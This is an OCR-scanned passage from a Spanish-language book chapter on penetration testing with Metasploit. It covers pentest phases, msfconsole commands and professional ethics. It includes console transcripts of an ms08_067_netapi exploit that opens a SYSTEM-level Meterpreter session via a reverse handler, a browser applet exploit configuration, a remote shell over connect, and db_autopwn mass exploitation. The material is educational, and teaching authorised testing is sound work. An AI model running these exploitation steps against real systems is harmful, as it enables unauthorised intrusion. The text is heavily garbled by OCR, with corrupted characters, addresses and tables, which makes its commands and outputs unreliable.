El test de intrusión conlleva un análisis activo sobre los sistemas para encontrar información sobre 
posibles vulnerabilidades de cualquier t tipo. Estas vulnerabilidades podrían ser el resultado de una ; 
mala configuración por parte del administrador, una mala implementación de una aplicación o yn 
fallo de seguridad en un sistema operativo o hardware. Este análisis es llevado a cabo desde la 
posición de un atacante, mencionado anteriormente, el cual podría realizar la explotación de las 
vulnerabilidades de seguridad encontradas. 


Tras el lanzamiento de tas pruebas de intrusión y la obtención de los fallos de seguridad de la 
organización se presenta esta información con una evaluación precisa de los impactos potenciales 
а la organización. Se definen medidas técnicas para reducir los riesgos a los que la organización se 
encuentra expuesta. 


Los test de intrusión son valiosos y de necesidad en un entorno empresarial por las siguientes razones; 


- Identificar vulnerabilidades críticas o high risk las cuales son el resultado de la utilización 
de vulnerabilidades de menor riesgo o lower-risk. 

- identificar vulnerabilidades que pueden resultar difíciles o prácticamente imposibles de 
detectar con escáneres de vulnerabilidades, los cuales automatizan el proceso. 


- Теѕіеаг los sistemas de protección de una red para verificar su comportamiento ante los 
ataques y come responden a éstos. 
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- Evaluar la magnitud de los ataques sobre los activos de la organización y el impacto de 
éstos sobre las operaciones de la empresa. 


- Determinar la viabilidad de un conjunto de vectores de ataque sobre la organización. 


Los lest de intrusión son un componente de una auditoría de seguridad completa, es decir, por 51 
solos no constituyen una auditoría completa. Los test de intrusión forman parte de distintos tipos 
de auditoría, como son las de caja blanca o caja negra. La principal diferencia entre ambas es la 
cantidad de información que se dispone sobre los sistemas. La auditoría de caja negra no presenta 
ningún tipo de conocimiento a priori, por lo que el pentester o auditor deberá primero delerminar 
la localización e información sobre los sistemas antes de comenzar el análisis. La auditoría de caja 
blanca ofrece cierto nivel de información al auditor sobre la infraestructura a testear, como puede ser 
un diagrama de red, códigos fuentes e información de direccionamiento 1P. 


También existen las auditorías de caja gris, las cuales son una prueba intermedia entre la caja negra 
y blanca. Los test de intrusión se engloban en las distintas auditorías comentadas anteriormente, la 
cantidad de información de la que se dispone а priori es la que determina el ámbito de la auditoría. 


Los test de intrusión disponen de distintas fases, las cuales se describen en el siguiente apartado. Por 
lo general, se puede enfocar el test de intrusión como una serie de pasos que debe seguir el auditor, 
es decir, se pueden englobar en procedimientos. En ciertos entornos y ámbilos el pentest se puede 
entender como un arte, ya que la experiencia del auditor a la hora de configurar las herramientas, la 
inwición sobre algunos sistemas y la disciplina a la hora de llevar a cabo el test de intrusión pueden 
levar a cumplir los objetivos de la auditoría. 


4. Fases del test de intrusión 


Durante el test de intrusión se pueden destacar unas fases diferenciadas, con objetivos particulares 
distintos y un objetivo común. El objetivo común es claramente realizar el testeo de la organización, 
mientras que los distintos objetivos de cada fase son ayudar a la aportación de información y pruebas 
sobre el estado de la seguridad. Hay que recordar que presentar un status de seguridad al cliente es 
primordial para obtener las conclusiones sobre el estado de su organización. 
Las fases del test de intrusión son las siguientes: 

- Alcance y términos del test de intrusión. 

- Recolección de información. 

- — Análisis de las vulnerabilidades. 

- Explotación de las vulnerabilidades. 

- — Post-explotación del sistema. 


- Generación de informes. 
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El contrato: alcance y términos del test de intrusión 

Es el punto de partida en todo test de intrusión, la fase de la entrevista, de las palabras. Se debe 
llegar a un acuerdo sobre hasta dónde se quiere llegar con el test de intrusión, cual es el ámbito de 
la prueba. En otras palabras, se discute cual es el alcance y los objetivos buscados por el cliente, y 
deben ser bien recogidos por un contrato firmado por ambos. ` 


Esta etapa es una oportunidad de ir haciendo ver al cliente іо que es realmente el test de intrusión y 
toda la información privada de la empresa que puede llegar a manejarse. Se puede ver también como 
una etapa educativa hacia el cliente. 


+ 
Puede ocurrir que el cliente quiera delimitar el ámbito de la prueba, por lo que se incorporen ciertas 
restricciones al test, Estas restricciones, siempre y cuando vayan por contrato, deben ser tomadas 
muy en cuenta por parte del auditor, ya que la información que se manejará será confidencial. 


Recolección de información 

En esta fase se recolectará toda la información posible sobre la organización a auditar. lista 
información puede ser obtenida por diversos medios, ingeniería social, medios de comunicación, 
publicaciones en Internet, google hacking, footprint, etc. Una de las capacidades más importantes 
en un auditor es la posibilidad de aprender como se comporta el objetivo, como funciona, como está 
construido y por último como poder atacarlo. | 


Toda la información recopilada sobre la organización es importante y permitirá al auditor disponer 
de una visión global de los tipos de controles de seguridad que existan en el lugar. 


Durante esta recolección de información es-importante identificar qué mecanismos de proleceión о 
seguridad existen en el lugar, para poder empezar a probar los sistemas. Identificar estas protecciones 
es de vital importancia para poder estudiar como funcionan estos sistemas de seguridad, 


Análisis de vulnerabilidades 
Una vez que se ha realizado la recolección de infor måción se estará en disposición de gran cantidad 
de la misma y se procederá a su análisis. En esta información recopilada se pueden encontrar 
vulnerabilidades existentes en un sistema. Нау. que realizar un modelado con toda la información 
recopilada en la que se determinará el método de álaque más eficaz. Este modelado tralará de buscar 
en una organización como si de un adversario se. ‚каде у de explotar las debilidades como un 
atacante lo haría. : 


Una vez que se han identificado los posibles. Vectores O: métodos de ataque con mayor viabilidad, 
habrá que reflexionar sobre como acceder al sistema, Poracceder se entiende que el posible ataque 
que lance el auditor disponga de una vía de > conexión Даша. al sistema á explotar. 


pi е 
El análisis de vulnerabilidades be ser: 'combiñádo. cof: Ja información que el auditor ha ido 


aprendiendo en la fase anterior. En otras palabras; el análisis. de vulnerabilidades utiliza información 
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sobre puertos, escaneos de vulnerabilidades, datos recogidos e información recolectada en la fase 
anterior para indicar al auditor la vía adecuada de acceso a la fase de explotación. 


Explotación de las vulnerabilidades 

lista fase es la más conocida por todos los lectores, y la que más emoción aporta al proceso de 
sruebas. lis la fase en la que el auditor siente е! cosquilleo en su interior y en la que se comprobará 
si la recogida de información y el análisis de vulnerabilidades fueron correctos о si por el contrario 
se cayó en un falso positivo. 


Un exploit debe ser lanzado si se dispone de la certeza de que obtendremos un resultado positivo 
en la prueba, A menudo, se utilizan herramientas para automatizar esta fase y se lanzan exploits 
sin disponer de dicha certeza. Tampoco es una mala política, ya que la aulomatización del proceso 
siempre es entendido como una buena práctica, pero el auditor está perdiendo el control sobre a yug 
esta sucediendo en el entorno de la organización. | 


En definitiva, se debe disponer de la certeza de que el sistema es vulnerabie para, disponiendo dei 


exploit, lanzar el código que devuelva el contro! sobre el sistema. Lanzar los exploits a ciegas no es 
га mejor opción, ya que se genera ruido sobre la organización, no es una acción productiva y además 
se pierde el contro! sobre lo que se está haciendo. 


Por el contrario, se puede automatizar el proceso de ianzamiento de exploits sobre las certezas 
que se dispongan, es decir, sabiendo que un sistema dispone de varias vulnerabilidades se puede 
automatizar el proceso para expictar todas éstas. 


Este fase será explicada en mayor detalle a través del uso de Metasploit Framework más adelante 
en este libro, 


Post-explotación del sistema 

Esta fase es otra de las más interesantes y que mayor cantidad de excitación puede provocar en el 
auditor. En esta fase ya se d ispone de acceso a algún sistema, pero se puede intentar acceder a Otros 
que tengan un mayor peso en la organización. 


Por ejemplo, suponga que el auditor dispone de acceso a una máquina, la cual tiene acceso directo и 
un controtador de dominio, el cual tras estudiarlo a través de la máquina vulnerada en primer ingar, 
se recoge que también es vulnerable. Este controlador de dominio puede ser explotado porel auditor, 
a través de la primera máquina. Con esta acción, se demuestra al propietario de la organización el 
gran impacto que supone que máquinas con, a priori, menor peso en la empresa sean vulneradas. 


Además en esta fase se puede obtener información sensible, muy interesante para el informe final. 
Por ejemplo, cuentas de usuarios, las cuales pueden proporcionar al auditor acceso a otras máquinas 
de la organización y seguir poniendo a prueba otros sistemas dentro de la empresa. La fase de post- 
explotación será tratada en este libro dotándola de la importancia que d ispone en un test de intrusión. 
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E 


Generación de informes | 
Esta fase refleja la importancia de comunicar todo el proceso que se ha ido realizando en Е? 
organización, Es importante que el auditor vaya documentando todas las acciones y procedimientos 
llevados a cabo durante el test de intrusión. Cada fase debe estar documentada en mayor о menor і 
medida, y es una buena práctica no dejar para el final todo este proceso, Quizá la generación del 


-informe se la fase más relevante e importante del test de intrusión. 


En estos documentos se debe explicar qué trabajo se ha realizado en la organización, cómo se ha hecho 
dicho trabajo, es decir, herramientas y técnicas utilizadas, y lo más importante, que vulnerabilidades 


han sido descubiertas durante el testeo de la organización. Como mínimo el informe debe ser. 


dividido en 2, bien diferenciados, como son el ejecutivo y el técnico, 


El informe técnico es un documento con gran nivel de detalle en el que se especifican todas | 


las acciones, con las herramientas, que se han ido utilizando y los resultados que se han ido 
obteniendo. Además, debe acompañarse de una lista que indique como subsanar esos riesgos y unas 
recomendaciones del auditor. 


El informé ejecutivo es un documento más ameno y liviano en el que se deben especificar las 
vulnerabilidades encontradas, pero sin ningún nivel técnico. Todo debe estar explicado de tal manera 
que cualquier persona sin capacidades técnicas entienda que riesgos existen en la organización, 
Además, el propietario de la organización esperará sus recomendaciones como profesional de la 
seguridad, por lo que en este informe debe existir dicha lista. 


3: Comandos básicos de Metasploit 


La interacción con el Jramework puede llevarse a cabo mediante el uso de distintas interfaces como 
se ha explicado anteriormente. En la mayoría de las ocasiones se utiliza la consola de Metasploit 
para realizar las pruebas y gestionar todas las herramientas disponibles en el framework, 


En un primer momento, la consola puede provocar cierto rechazo o temor al usuario, ya que рог lo 
general la mayoría de usuarios prefieren el uso de una interfaz amigabie e intuitiva, La consola dè 
Metasploit es bastante intuitiva y sencilla de utilizar; integrando comandos con semántica implícita | 


los cuales ayudarán al usuario a configurar y moverse por el entorno de manera sencilla, 


Pary lanzar la consola de Metasploit se ejecutará en una terminal el comando msfconsole, el cual 
devolverá al usuario un prompt para la introducción de comandos, un banner e información sobre el 


número de exploits, payloads, encoders, auxiliary у nops. 


Antes de empezar a enumerar comandos y sus objetivos, se debe tener claro como se estructura, 
y accede a los elementos disponibles del framework. Se puede imaginar la consola de Metasploit 


como un mini sistema de archivos, el cual dispone de una raíz y carpetas que cuelgan de él, Las 
carpetas que cuelgan de él, realmente se encuentran fisicamente en la ruta dónde está instalado el 


+ 
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framework. Por ejemplo, si se requiere utilizar un exploit, éstos se encontrarán en alguna ruta, como 
puede ser exploit/windows/smb/psexec. 
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Fig 1.09: Lanzamiento de msfvonsole con información sobre el framework. 


Otro ejemplo podría ser si se requiere la utilización de un módulo auxiliary, una ruta posible sería la 
siguiente auxiliarp/scanners/smb/smb2. De estos 2 ejemplos se deduce que si se requiere utilizar un 
encoder su ruta comenzará por encoder/<tecnología> y así ocurre con los demás tipos de módulos 
de los que se dispone en el framework. 


Para acceder y obtener información a exploits, encoders, payloads, etc, se disponen de ciertos 
comandos que se irán explicando а continuación, pero antes, hay que destacar lo que son los 
elementos del framework. Se pueden entender como variables que se deben configurar en el interior 
de un exploit u otros módulos con los que se trabaje. Es decir, cuando se quiere configurar un 
exploit, o un encoder, payload, etcétera, se disponen de unas variables que deben ser configuradas 
con información aportada por el auditor. Por ejemplo, si se está configurando un exploit que se va a 
lanzar contra un equipo, existen ciertas variables o parámetros que deben ser proporcionados por el 
auditor como son la dirección ЇР o nombre de la máquina sobre la que se lanzará el exploit, puerto 
de destino, configuración del payload, en el caso de que se intente provocar la ejecución de código 
remoto y tomar el control de la máquina. Estos elementos o variables se muestran en mayúsculas, 
algo que llamará la atención del auditor. Algunas variables son opcionales y otras son totalmente 
obligatorias de configurar. 


Hodule options (exploit/multi/browser/java_signed_applet): 


Current Setting ада Description 


БЕ ССЕСГГЕОС СТЕГОН 


Name 


APPLETNAME —Siteloader yes ` The main applet's class name. 
СЕАТСК Metasploit Inc. yes The CH= value for the certificate. 

SRVHOST 9.8.8.8 yes The local host to listen on. This must be an address on 
the tocal machine ог 0.8.8.9 i 


SRVPORT 5086 yes The local.port to listen on. 

SSL false ` no Negotiate SSL for incoming connections 

SSLVersion 5513 йо Specify the version of SSL that should be used {ассерїе 
d: 5512, 5513, TLS1) ; 

URIPATH no The URI to use for this exploit (default is random) 


Fig 1.10: Variables de un módulo de Metasploit. 
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Comandos de ayuda y búsqueda 

Existen numerosos comandos de msfconsole los cuales proporcionan ayuda al usuario dando 
información sobre acciones que se pueden realizar con el framework o información sobre los módulos 
disponibles. Además, resultan de gran utilidad los comandos para realizar búsquedas dentro de la 
estructura de Metasploit. 


Comando: help 

El comando help proporciona un listado sobre todos fos comandos de consola disponibles. 54 
pueden observar 2 listas diferenciadas, core commands y database backend commands. La primera 
proporciona un listado sobre los comandos del núcleo del framework, y la segunda ofrece otro sobre 
los comandos que interactúan con las bases de datos. 


Existe la posibilidad de usar el parámetro —h con los comandos para obtener una ayuda detallada 
sobre la utilización de dicho comando, Por ejemplo, search —h, o incluso utilizando el comando help 
delante del comando del que se requiere información o ayuda, help search. 


Comando: search 

El comando search resulta de gran utilidad para el auditor para la búsqueda de módulos en función 
de alguna característica concreta. También se puede utilizar cuando el auditor tiene que comprobar 
si el framework se encuentra actualizado, por ejemplo mediante la búsqueda de algún exploit que se 
aproveche de alguna vulnerabilidad conocida recientemente, 


msf > search psexec 
[*] Searching loaded modules for pattern 'psexec'... 


Exploits 


HEST 


Disclosure Date Rank Description 
жаы лына 1999-91-61 manual Microsoft Windows Authenticated User Code E 
xecution | 
Minds reta 2001-93-31 excellent Microsoft Windows SMB Relay Code Execution 


Fig 1.11: Búsqueda de módulos con ciertas características. 


Сото se puede observar tras realizar la búsqueda de un módulo con ciertas características se obtienen 
las rutas donde se alojan y donde se puede acceder al recurso. En este ejemplo, se puede visualizar 
como se obtienen exploits, pero si existiesen herramientas, payloads, encoders que cumpliesen con 
el patrón de búsqueda también se obtendrían sus rutas para que el auditor pudiera acceder a ellas de 
manera sencilla. | 


Comandos: info y show 

El comando info aporta gran cantidad de información sobre el módulo seleccionado previamente 
en la consola mediante el comando use, o ejecutando el comando info seguido de la ruta dónde se 
encuentra el módulo concreto del que se requiere obtener información, Los datos que devuelve el 
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comando info son todas las opciones del módulo, objetivos y una descripción. Por ejemplo, en el 
caso de la mayoría de exploits se describe la vulnerabilidad y las versiones vulnerables. 


El comando show permite mostrar las diferentes opciones para los módulos del framework y todos 
los exploits, payloads, encoders, nops, herramientas, etc. Cuando se encuentra seleccionado un 
módulo, mediante el comando use, show dispone de algunas acciones más como es la muestra de 
las variables configurables en el módulo, show options, o los sistemas operativos vulnerables, show 
targets, entre otros, 


t show encoders show nops show payloads show post 
show auxiliary show exploits show options show plugins 

msf > use exploit/multi/browser/java _ signed applet 

msi exploit(java_signed applet) > show 

show actions show auxiliary show exploits show payloads show targets 
show advanced show encoders show nops show plugins 

show all show evasion show options show post 

msf exploit(java signed applet) > show 


Fig 1.12: Show en función del ámbito con sus opciones. 


Comandos de interacción y configuración 

La mayoría de los comandos que se disponen en msfconsole son de interacción y configuración. 
Estos comandos van desde la simple navegación por la herramienta, hasta la ejecución de un exploit 
соп su previa configuración. 


Comando: use 

El comando use permite seleccionar el módulo, a lo largo de la estructura de directorios del 
Jramework, que se requiere. Una vez se ha encontrado una vulnerabilidad en un sistema, se puede 
realizar la búsqueda de la misma mediante el comando search o si se conoce la ruta dónde se aloja 
el módulo, directamente cargarlo. Un ejemplo sería use exploit/multi/handler. 


Comandos: back, set, setg, unset y unsetg 

ixisten comandos para la configuración de valores en los móduios que el auditor necesita 
personalizar para el test de intrusión. Además, se ha visto como el comando use permite acceder a 
módulos concretos, pero si el auditor requiere volver atrás, ¿de qué comando dispone? El comando 
back permite al auditor salir del módulo y colocarse de nuevo en la raíz de la consola. 


Los comandos sef y setg aportan una funcionalidad imprescindible para el test de intrusión y es la 
posibilidad de configurar los parámetros de los distintos módulos. Es decir, con estos parámetros 
se asignarán valores a las variables que por ejemplo definen un exploit, ¿Cuál es la diferencia? Ser 
asigna un valor para un módulo concreto, mientras que sefg asigna el valor para el contexto del 
Jramework. Un símil en programación clásica sería, set asigna un valor a una variable local, mientras 
que жеге asigna un valor a una variable global. 
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Hay que tener en cuenta que si se dispone de un módulo en modo background, es décir cargado е 


incluso en explotación o realizando alguna tarea pero en segundo plano, y éste ya disponía de una 
configuración, la asignación global de un valor no repercutirá sobre este elemento, 


Los comandos unset y ипе! sirven para desasignar el valor de un parámetro o variable de un 
módulo. Unset desasignará a nivel local, mientras que unsefg desasignará a nivel global, 


Comandos: connect e irb 

El comando connect permite conectar desde la consola de Metasploit con otras máquinas para su 
gestión o administración. Simplemente, se debe indicar la dirección y el puerto al que se quiere 
conectar. 


Este comando es muy similar a la aplicación netcat y totalmente compatible con ella. Connect 
dispone de parámetros interesantes como es la posibilidad de crear una conexión segura bajo SSL. 
Se recomienda utilizar este y todos los comandos siempre con el comando help en mente: 


ms > connect 192,168,0,136 4444 
[*] Connected to 192.168.8.136:4444 
Microsoft Windows [Versión 6.1.7691] 
Copyright (с) 2009 Microsoft Corporation. Reservados todos los derechos. 


C: \Wsers\bit>whoami 
whoami 
bit-pcipablo 


Fig 1.13: Conexión mediante connect con una máquina Windows. 


El comando irb permite al auditor ejecutar un intérprete de Ruby para el framework y de esta manera 
se pueden ejecutar comandos y crear scripts que automaticen ciertos procesos, todo ello en caliente, 

Esta funcionalidad es interesante para conocer la estructura interna del framework. Se recomienda 
conocer el lenguaje Ruby para utilizar correctamente este intérprete. 


Comandos: load, unload y loadpath 

Metasploit en su estructura interna dispone de una carpeta dónde aloja los plugins. El comando lod! 
permite especificar qué plugin se quiere cargar. Por lo que si se añaden nuevos plugins al framework: 
se deberán almacenar en dicha carpeta, Por otro lado, si se quiere quitar un plugin del entorno s se: 
utilizará el comando unload. са 


También se dispone de un comando а! cual se le especifica un directorio dónde se pueden encontrar: 
almacenados módulos, plugins o exploits externos al framework, y disponer de 0-day, exploits, i 
payloads, en un directorio de trabajo independiente. 


msi > load wmap 
{*] [WMAP 1.0] == et [ ] metasploit.com 2011 


б }{+] successfully loaded plugin: wmap 
msf > 


Fig 1.14: Cargando un plugin en el framework. 
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Comandos: check, exploit y sessions 

Cuando el auditor se encuentra en la fase de explotación, es decir, ya ha encontrado la o las 
vulnerabilidades por dónde atacar al sistema, el comando check aporta la posibilidad de verificar si 
el sistema es vulnerable o no, antes de lanzar el script. 


El comando exploit lanza, una vez configurado el módulo seleccionado, el código malicioso sobre 
una máquina o prepara el entorno para que una máquina sea vulnerada al acceder a un sitio en la red. 
El comando dispone de varios parámetros interesantes los cuales se especifican en la siguiente labla: 


p 


arámetro Descripción 


El exploit es ejecutado en segundo plano 
No se interactúa con la sesión tras una explotación exitosa 


Se lanza el payload соп la codificación mediante un encoder previamente 


Tabla 1.01: Parámetros del comando exploit. 


Por lo general, el comando exploit devolverá el control del sistema remoto mediante una shell 
о un meterpreter, Por último, las shell que se obtienen se organizan por conexiones y éstas son 
visualizadas por el comando sessions. Este comando permite listar el número de conexiones con 
máquinas vulneradas que se disponen, que vía ha sido la que ha conseguido vulnerar la máquina, 
información sobre los puertos y direcciones 1P, el tipo de payload, еіс. Es importante entender que 
las sesiones lienen un identificador único y que se debe especificar dicho identificador cuando se 
quiere interactuar con una sesión remota. Los identificadores son números enteros, la primera sesión 
abierta dispondrá del número | y van aumentando con nuevas sesiones que se vayan consiguiendo. 
En la siguiente tabla se muestran los distintos parámetros que dispone el comando sessions: 


: Descripción 


Lista las sesiones disponibles 


Parámetro 


Muestra información extra, es interesante utilizarlo junto al parámetro -i 


Ejecuta un script de Metasploit sobre todas las sesiones Че Meterpreter disponibles. 
Su uso sería sessions =s <script> 


Finaliza todas las sesiones abiertas 


Ejecuta un comando sobre todas las sesiones de Meterpreter abiertas. Su uso sería 
sessions —c “ping 8.8.8.8” 


Uno de los más interesantes, permite actualizar la shell remota de tipo Win32 a un 
Meterpreter. Se debe especificar el 1D de la sesión 


Con este parámetro se le indica al comando sessions en que sesión se quiere 
interactuar, Un ejemplo es sessions —i 1 


Tabla 1.02: Parámetros del comando sessions. 


Capitulo 1. Conceptos básicos 


asf exploit(ms08_967_netapi) > check 


{*] verifying vulnerable status... (path: 8x0B00095a) 
t+} The target is vulnerable. 

msi exploit(ms88_967_netapi) > exploit -j 

{*] Exploit running as background job. 


(+3 Started reverse handier оп 192.168.0.55:4444 
msf exploit(ms08_067_netapi) > [*] Automatically detecting the target... 

[+] Fingerprint: Windows XP - Service Pack 3 - tang:Spanish 

[+] selected Target: Windows XP SP3 Spanish (NX) 

[+] Attempting to trigger the vulnerability... 

[*} Sending stage (749056 bytes) to 192.168.,0.54 

{+} Meterpreter session 1 opened (192.168.9.55:4444 -> 192.168. ; 
Кы ы 2,168.0.54:1043) at 201 


nsf exploitims00_067_netapi) > sessions -1 


Active sessions 


Information Connection 


1 meterpreter x86/win32 МТ AUTHORITYASYSTEM  PRUEBAS-01768CC 192.168.0.55 
:4444 -> 192.168.9.54:1043 i 


Fig 1.15: Verificación, explotación e interacción con sistema remoto. 


Comandos: resource y makerc 

El comando resource permite la carga de un fichero, generalmente especificado con la extensión FC, 
la cual no es necesaria, con acciones específicas sobre el framework. Este comando es muy utilizado 
para automatizar tareas que se deben realizar con Metasploit y las cuales se conocen de antemano o 
se han realizado previamente. 


El comando таќеѓс almacena en un fichero el historial de comandos y acciones que se han 
realizado en la sesión en curso соп el framework. Es decir, si se requiere guardar el historial del 
trabajo realizado durante el día con Metasploit, makerc genera un listado con toda esta información 
almacenándolo en el fichero que se le indique. Por defecto, este fichero se genera en el home del 
usuario en un directorio oculto denominado .тзу3, aunque dependerá de la versión de Metasploit 
que se esté utilizando. 


msf exploit(psexec) > makerc 164 
[+] Saving last 4 commands to 164 ... 

msf exploit(psexec) > exit 

[*] You have active sessions open, to exit anyway type "exit -y" 
msí exploit(psexec) > exit -y 

гоої@гоої:~# cat .msf3/164 

search smb 

use exploit/windows /smb/psexec 


Fig 1.16: Generación de historial de sesión. 


Comandos: save y jobs | 
El comando save aporta persistencia а la configuración del entorno. Esto es algo realmente útil 
cuando el test de intrusión es largo у con un gran número de características. El fichero con la 
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a 


configuración se almacena en el home del usuario en la carpeta oculta .msf3 y tiene como nombre 
config Cuando se lanza msfconsole, éste comprueba la existencia de diche fichero y si existe carga 
la configuración almacenada en él. 


El comando jobs muestra los módulos que se encuentran en ejecución en segundo plano о background. 
Este comando, además, permite finalizar otros trabajos que se están ejecutando en segundo plane y 
obtener información detallada sobre los módulos en ejecución. 


Comando: run 
lil comando run permite realizar la ejecución de un módulo auxiliary cargado en el contexto de la 
consola, | 


t 


| 


mf > use auxalery/scanner/Ttp/anonymous 
sf auziliary[enonyinous) > set RHOSTS ftp.fi.upm.es 
¡RHOSTS => ftp. баеп, es 


psf auxiliarylananymens) > гип 


Йй 133.190.8.47:21 Anonymous READ {22@ ProFTPD 1.2.8 Server (ProFTPD Default Installation) [айт 
| а. e. es) 

f=] Scanned 1 nf 1 hosts (169% complete) 
t+] Auxiliary module execution completed 
msf suxiliarylanonymous) > 


dr A A A A A RI: «TR a 


=. 


ig 1.17: Ejecución de un módulo auxiliary con run. 


Comando: route 

Este comando permite enrutar sockets a sesiones, disponiendo de un fimcionamiento similar al 
comando route en Linux. Además, permite la adición de subredes, puertas de enlace о gateways y 
máscaras de red. Este comando puede ser muy útil en la técnica conocida como pivoting. 


Comandos de base de datos 


Metasploit permite la utilización de información almacenada en bases de datos por otras herramientas - 


de recogida de información y análisis. Esta funcionalidad es de gran interés en un test de intrusión, 
ya que en función de dicha información se pueden ir realizando distintas pruebas sobre los sistemas 
de la organización. 


| 


db аба cred db_del_port db import_amap_mlog Ч пар 
db_add_host db_destroy db_import_ip360 xml dhb notes 

96 ада поїе db діѕсоппесї db ітрогї ір 1151 db_services 
40 абд pert db_driver db_import msfe xel db status 
db_autopwn db_exploited db_import_nessus_ube db_sync 
dh_connect db export db_import_nessus xml db vulns 
db_create db_hosts db_import_nmap_xml db workspace 
db creds db_import db import_qualys xml 

db del host db import атар log @ loot 


Fig 1.18: Comandos de Metasploit con interacción con la base du datos. 
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Comando: db driver 


El comando «è driver indica las bases de datos que se encuentran disponibles para que Metasploit 


las utilice y la base de datos configurada por defecto. Este comando permite cambiar la base de datos 
«ue el auditor quiere utilizar. 


t 


Active Driver: mysql 
Available: postgresql, mysql 


1 Using database driver postgresql 
msí > db_driver 
+] Active Driver: postgresql 
[=] Available; postgresql, mysql 


Fig 1.19: Ejecución de db_driver: 


Comando: db_connect _ | 

ЕІ comando dh_connect crea y conecta con ja base de datos. Previamente, se debe configurar 
el usuario en la base de datos. Este comando prepara todas las tablas en la base de datos que se 
utilizarán en la recolección de información y análisis para almacenar los datos obtenidos de los 
sistemas que se estén auditando, 


fast > db connect post, р 
|931 > db_comnect postgres:123abc.(127.0.8,1/metasplalt 


NOTICE: CREATE TAGLE will create implicit sequence "hosts_id ѕед" for serial column “hosts. id” 
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts pkey” for table “hosts" 
NOTICE: CREATE TABLE will create implicit sequence "clients id seq" For serial column “clients. 


CREATE TABLE / PRIMARY KEY will create implicit index “clients pkey" for table "clients 
CREATE TABLE Will create implicit sequence "services_id seq" for serial column “service 


CREATS TABLE / PRIMARY XEY will creste implicit index “services pkey" for table "servie 


Fig 1.20: Crear y conectar con la base de datos en Metasploit. 


Cemandos: db_nmap y db_autopwn 
El comando а ттар ejecuta la herramienta птар y almacena todos los resultados del escaneo 
en las tablas preparadas en la base de datos previamente. El auditor debe conocer los distintos * 
modificadores o parámetros de este escáner para sacar el máximo provecho a este proceso, Con el 


parámetro —h se muestra la ayuda de Ф ттар donde se pueden consultar los distintos modificadores 
para los distintos tipos de escaneos, 


El comando 25 ашорит ayuda al auditor a lanzar una colección de exploits frente a una o varias 
máquinas de las cuales se ha obtenido información, como pueden ser puertos abiertos, versiones 
de productos detrás de dichos puertos, versiones del sistema operativo, etcétera. Este comando es 
conocido como la metralleta de Metasploit y automatiza en gran parte el proceso del lanzamiento de 
exploits sobre vulnerabilidades descubiertas, Hay que tener en cuenta que en las últimas versiones 
de Metasploit, en su edición Community, este comando ha sido eliminado. Si se quiere seguir 
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utilizando se recomienda actualizar manualmente el framework y по utilizar el comando msfupdate 
para actualizar Metasploit. 


Como parámetros interesantes se especifican los siguientes: 


Selecciona los módulos basados en vulnerabilidades referenciadas 


Parámetro Descripción 


Muestra todos los exploits que se están probando · 


Selecciona los módulos basados en puertos abiertos 
Lanza exploits contra todos los equipos objetivo 
Utiliza una shell inversa tras la explolación 

Utiliza una shell atada a un puerto aleatorio 


Se le pasa un rank, para sólo seleccionar módulos con cierto nivel. La ejecución 
sería db_autopwn -p —t -e —r -R good 


Tabla 1.03: Parámetros del comando db_antopwn. | 


Comando: db_hosts 
Este comando lista las máquinas que se encuentran alojadas en la base de datos. Proporciona 


información interesante sobre los distintos equipos que serán auditados y de los que se disponen 
datos. | 


Se pueden observar datos como el sistema operativo de la máquina, dirección MAC, la versión del 
service pack y más información de utilidad. | i 


msf > db_hosts 


os flavor 05 5р purpose info comments 


mac name 05 name 


Ls venam AAA 


can --..- ro oo. 


138.100.8.47 
192.168.9.54 PRUEBAS-01768CC Microsoft Windows ХР SP3 device 


Fig 1.21: Listado de máquinas almacenados en la base de datos. 


Comando: db_destroy 


Este comando elimina la base de datos que está utilizando en un momento dado. También se puede 
indicar ta eliminación de la base de dalos de la siguiente manera db_destroy user:password@ 


host:port/database. 


——„ 
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6. Notas éticas 


Históricamente el término hacker ha definido a la persona con altos conocimientos técnic f 
seguridad informática, o informática en general, el cual dispone de la Spaca de у el 
aprender e introducirse en sistemas remotos sin autorización previa a través de Internet. L чо үн 
utilizadas por éstos son diversas, pueden ir desde la investigación de un fallo de үка я 
aplicación que da acceso a una base de dalos, como el engaño о engatusamiento de pea ү = 
con ciertos privilegios sobre un sistema mediante ingeniería social. También hay с i y ‚е И 
que históricamente, la filosofía del hacker ha propuesto la libertad del А “ к 
los medios digitales, es decir, utilizar la capacidad para visualizar información no кч ЕА P 
intención de realizar ninguna acción sobre ella que pueda otorgar un beneficio al hacker р 


Ahora, ¿qué es el hacking ético? A lo largo del tiempo, el hacker ha sido tachado negativamente, por 
lo que la visión de la sociedad sobre él, no es lo que su filosofía planteaba, Quizá, esto ha e i 
por la autoproclamación de algunos a llamarse hackers y realizar acciones sire sistemas p 
objetivos de dudosa moral, ya sean económicos o el simple hecho de realizar una acción Aa 


. sobre un usuario u organización. 


El hacking ético nace como una metodología en la que se intenta educar y aprovechar las capacidades 
de las personas apasionadas con la seguridad informática. Estas personas o profesionales del seéldr 
realizarán ataques informáticos a organizaciones sin que éstos sean ataques reales, es decir, se 
comprueba el estado de seguridad en el que se encuentra la organización de una manea ШОШ 
Estos profesionales deben disponer de la ética profesional рага no aprovecharse de sus eno: 
ni de las situaciones que pueden surgir. Por ejemplo, puede darse la siguiente situación: Una empresa 
quiere auditar y comprobar hasta dónde puede llegar un usuario, con ий nivel de acceso bajo e 
información de la empresa que reside en un sistema crítico de ésta. La empresa decide йил: 
a alguien que simule ser un empleado con cierto nivel de acceso, y ver hasta dónde puede Пер 
Una vez esta persoria ha logrado acceder а la información que la empresa no quería mostrar Е 
informa а la organización de qué procedimiento ha llevado а cabo para lograr el objetivo, La сва 
contratada debe disponer de una ética profesional, ya que si Іа empresa сопігаіаѕе aal gu le А «dicha 
ética, se encontrarían, seguramente, con bastantes problemas de confidencialidad. 


El profesional de la seguridad dispone de una ética, la cual es la marca e imagen de lodo su trabajo 
І р MS au 5 
А continuación se exponen buenas prácticas a llevar а cabo en un proceso de auditoría, las cuales 
Е ы П . , ? Б 
pueden ser tomadas por cualquier profesional para construir su ética: 


- Мо atacar objetivos sin el respaldo de un contrato o permiso escrito. 


- Generar el mejor informe posible, tanto en su formato técnico, con un proceso elaborado 
y detallado de las acciones llevadas a cabo, como en su formato ejecutivo, explicando con 
gran detalle los problemas de seguridad encontrados. 


- No realizar acciones maliciosas sobre los sistemas que se estén verificando en la 
organización. 
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А j 
r 
- Нау que considerar que toda acción tiene consecuencias. Si se realizan acciones fuera del | С apítul 0 П 
* ' ámbito del.contrato se te rán consecuencias negativas para el „ Ofesional, | ш 
